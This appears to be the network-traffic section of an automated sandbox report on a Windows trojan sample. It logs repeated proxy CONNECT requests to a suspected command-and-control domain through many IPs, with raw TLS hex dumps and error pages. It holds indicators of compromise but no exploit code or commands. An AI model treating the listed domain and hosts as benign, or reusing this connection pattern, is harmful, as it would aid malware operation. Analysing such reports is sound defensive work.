                                                                                Feb 23, 2024 14:28:29.367896080 CET832INData Raw: 06 03 55 1d 23 04 18 30 16 80 14 60 7b 66 1a 45 0d 97 ca 89 50 2f 7d 04 cd 34 a8 ff fc fd 4b 30 60 06 08 2b 06 01 05 05 07 01 01 04 54 30 52 30 25 06 08 2b 06 01 05 05 07 30 01 86 19 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 70 6b 69 2e 67 6f 6f 67 2f
                                                                                Data Ascii: U#0`{fEP/}4K0`+T0R0%+0http://ocsp.pki.goog/gsr10)+0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0
                                                                                Feb 23, 2024 14:28:29.531213999 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 76 8e 83 08 51 ff 24 63 00 16 ab 16 13 d7 8e ab 23 6d 82 6f d3 24 a9 bd aa 51 59 85 e1 a5 dd 06 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 a8 3c bb d5 f5 f4 1a 92 f0 78 48 66 52 a4 0b d8 ed e5 73 25 ba
                                                                                Data Ascii: %! vQ$c#mo$QY(<xHfRs%~BS7
                                                                                Feb 23, 2024 14:28:29.836327076 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 20 00 c0 ac 70 ba 2f 10 66 a6 90 e5 38 b2 f5 f9 36 ac ee ce ca d8 db c6 6f db 98 db 02 86 e1 16 f0 28 bb 9f 1b 1c f4 45 40 8f ed 03 8e 70 2c 1f eb 29 96 23 ba 66 2d d0 d9 72 99 8c 8b 58 81 f5 4a 81 61 5e 03 03
                                                                                Data Ascii: p/f86o(E@p,)#f-rXJa^v"BLnBM)"@p/Y_%xB)|lC@r,4 d|EyYeltulNv6k*(?r0uR
                                                                                Feb 23, 2024 14:28:29.837519884 CET147OUTData Raw: 17 03 03 00 8e 00 00 00 00 00 00 00 01 fa 50 08 fd d4 a1 51 b4 2c be b4 0b fa 1c 80 61 f6 a8 28 3b 78 72 22 93 e3 6e eb b2 9b ed 3e b9 33 65 fb 10 5a ed e9 f3 7d 4a 18 9a 9a 7f 1c 36 2e 81 41 45 a2 95 38 3a bf 54 87 3e a8 6d 30 65 dc 85 26 5c c3
                                                                                Data Ascii: PQ,a(;xr"n>3eZ}J6.AE8:T>m0e&\0;DPj#_a$$!~`5vF0}6=&UN(VQ
                                                                                Feb 23, 2024 14:28:30.620137930 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 ec 90 7f c9 04 4b 3f 98 bf 84 5c 13 3d f6 eb 39 c5 b5 9c 1e 19 54 95 cc 6c 82 98 b0 4d 85 69 2c 8b 85 1b f4 1a 28 6b 7f 85 2a f5 31 40 a9 d9 e1 ce 46 7c ad 8d 8e c6 6d 09 4f 47 14 75 d2 e3 d6 0a 3a 7a f5 d3
                                                                                Data Ascii: qK?\=9TlMi,(k*1@F|mOGu:zGU*06L$n!C3WA@y-WSkO+hxp0CE)Rjy+'jcI[^gj-K#`'nQ]S&!_8(&24-L
                                                                                Feb 23, 2024 14:28:30.620146036 CET267INData Raw: dd 15 37 47 1d bb 28 fc b9 81 c6 ed 3f 34 e8 0a 9d 19 54 4c 9d c0 14 fc 22 62 b7 ca c2 7e 3c ca 0a b2 73 35 96 da c6 68 71 d9 fc 5e 04 26 22 45 d0 01 58 d8 a0 56 6d 33 fe be 49 f5 9a dc da 80 aa 1a 5c 21 e8 0c 3b df 04 1b 66 65 7a 09 0a 90 79 0a
                                                                                Data Ascii: 7G(?4TL"b~<s5hq^&"EXVm3I\!;fezy#J#C~.;-}ggb=/"qH;8y"&Y~D"5^y#~`ZI-XS07T@RCQ=vr]3r7jQ~KAk?~#


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                936192.168.2.852989104.16.105.142805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.722510099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.810235023 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                937192.168.2.852942146.59.2.185805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.739708900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                938192.168.2.852998192.210.228.28156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.747278929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                939192.168.2.853040172.67.253.69805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.751455069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.838768959 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                940192.168.2.85295272.206.181.105649355828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.751693010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                941192.168.2.85293314.47.70.13780805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.760186911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.382585049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.382462978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.194991112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                942192.168.2.853064104.25.167.88805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.765743017 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.853549004 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                943192.168.2.853070104.24.193.186805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.766043901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.853847980 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                944192.168.2.85295581.250.223.126805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.771981001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.963490963 CET830INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                Content-Length: 638
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                945192.168.2.852947185.101.16.52805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.775343895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                946192.168.2.852964141.94.174.624505828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.776556969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.382481098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.992028952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                947192.168.2.85299964.227.106.157805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.780021906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.935650110 CET327INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                948192.168.2.85298798.162.25.29316795828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.781024933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                949192.168.2.85293439.99.144.43805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.789310932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                950192.168.2.851769120.28.216.14780825828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.814568996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.882443905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.882699013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                951192.168.2.851762148.72.209.174394585828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.823420048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.882443905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.883735895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.882801056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                952192.168.2.851804181.212.45.22680805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.825495005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.426645041 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                953192.168.2.85303798.170.57.24941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.825841904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                954192.168.2.852944125.228.143.20741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.826020956 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                955192.168.2.853067164.92.86.113641105828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.831872940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.382481098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.991934061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.991843939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.991925955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.882596016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.882536888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.695100069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.991729975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                956192.168.2.8530493.127.62.252805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.832732916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.007093906 CET152INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: PHP/5.4.45
                                                                                Server: lighttpd/1.4.16
                                                                                Content-Length: 0
                                                                                Feb 23, 2024 14:28:29.016871929 CET394OUTData Raw: 16 03 03 01 85 01 00 01 81 03 03 65 d8 9d 7c 36 21 3e 27 49 73 f0 56 67 55 cf ff 37 ac f4 d1 08 23 3d bd 76 12 0b de f2 a9 73 87 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                Data Ascii: e|6!>'IsVgU7#=vs*,+0/$#('=<5/.-+(heygirlisheeverythingyouwantedinaman.com#]31VM\11_&nk7%6ydd`8
                                                                                Feb 23, 2024 14:28:29.187525034 CET1129INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 ea 9c 25 de 7e 16 ca 11 be 4c 88 d3 4b 91 e9 7c 62 79 62 19 ab 36 b0 6b 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 e8 0b 00 02 e4 00 02 e1 00 02 de 30
                                                                                Data Ascii: =9%~LK|byb6kDOWNGRD0000*H03110/U(heygirlisheeverythingyouwantedinaman.com0240223132724Z260222132724Z03110/U(heygirlisheeverythingyouwantedinaman.c
